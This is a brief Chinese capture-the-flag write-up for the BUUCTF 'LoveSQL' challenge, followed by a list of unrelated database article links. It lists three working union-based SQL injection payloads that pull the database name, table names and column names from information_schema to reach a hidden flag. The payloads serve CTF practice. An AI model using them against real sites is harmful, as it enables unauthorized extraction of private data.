BUU10 [极客大挑战 2019]LoveSQL1

万能用户名(密码随便)

登录进去以后发现是这个东西,然而并没有什么卵用

然后就开始爆破数据库名字--表名--列名

注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名

1.1' union select 1,2,database() #

(爆出来数据库名字是 geek)

2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)

3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#

(爆出来有id(永远都是1)和username和password还有flag)

这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见

相关推荐
ONETHING_CLOUD_219 分钟前
华为NAS真实测评!
网络·数据库·科技·华为·nas
NineData1 小时前
10分钟部署!一文读懂NineData社区版强在哪里?
数据库
手握风云-1 小时前
MySQL数据库精研之旅第一期:开启数据管理新旅程
数据库·mysql
极限实验室1 小时前
通过 INFINI Console 集中管理极限网关配置
服务器·数据库
jay丿1 小时前
使用PyMongo操作MongoDB(一)
数据库·mongodb·oracle
江沉晚呤时1 小时前
深入解析过滤器模式(Filter Pattern):一种灵活高效的设计模式
java·开发语言·前端·数据库·microsoft·asp.net·.netcore
凡巾2 小时前
河南大学数据库实验4
数据库·oracle
划水的运维2 小时前
GaussDB分布式集群数据库创建database
数据库·分布式·gaussdb
数据知道2 小时前
数据库:一文掌握 MongoDB 的各种指令(MongoDB指令备忘)
数据库·mongodb
背太阳的牧羊人2 小时前
查看 MongoDB 数据库中的表和数据
数据库·mongodb